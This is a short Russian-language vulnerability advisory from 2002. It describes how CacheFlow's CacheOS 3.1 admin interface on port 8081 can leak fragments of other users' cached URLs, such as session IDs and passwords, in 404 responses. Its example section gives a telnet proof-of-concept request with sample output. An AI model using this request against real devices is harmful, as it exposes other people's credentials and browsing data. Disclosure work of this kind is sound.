Несанкционированный доступ к CacheOS
- Дата публикации:
- 09.01.2002
- Всего просмотров:
- 727
- Опасность:
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
CacheOS - изделие, используемое устройствами Web кэширования сделанными
CacheFlow, которое является мини сервером с RAID контроллером и
предустановленной опрерационной системой.
CacheFlow имеет Web интерфейс администрирования, открытый на 8081 порту по
умолчанию. Посылая определенно составленный запрос, злонамеренный нападающий
может просматривать определенные кэшированные со временем Web страницы.Используя
этот метод, можно собрать информацию об имени пользователя/пароле, содержание
формы, содержание формы, URL и т.д.
Уязвимость найдена в CacheOS 3.1
Пример:
соединитесь с 8081 портом, затем выполните следующую команду:
localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm
HTTP/1.0 200 OK
Request cannot be honored
Connection closed by foreign host
Однако если вы пробуете несколько раз, запрос когда-нибудь возвратит кое-что
вроде
этого:
localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm
HTTP/1.0 404-Not Found
404 Not Found
Therequest
ed URL "/Secure/Local/console/cmhome.htm
Easp&o=0&sv=za5cb0d78&qid= E2BCA8F417ECE94DBDD27B75F951FFDA&uid=
2c234acbec234acbe&sid=3c234acbec234acbe&ord=1" was not found on this
server.
Connection closed by foreign host.
Как видно, кусок кода в 404 страницах содержит часть URL, который клиент
посещал в то время. Используя Эту технику, можно читать пароли и т.п.
Ссылки: http://www.cacheflow.com/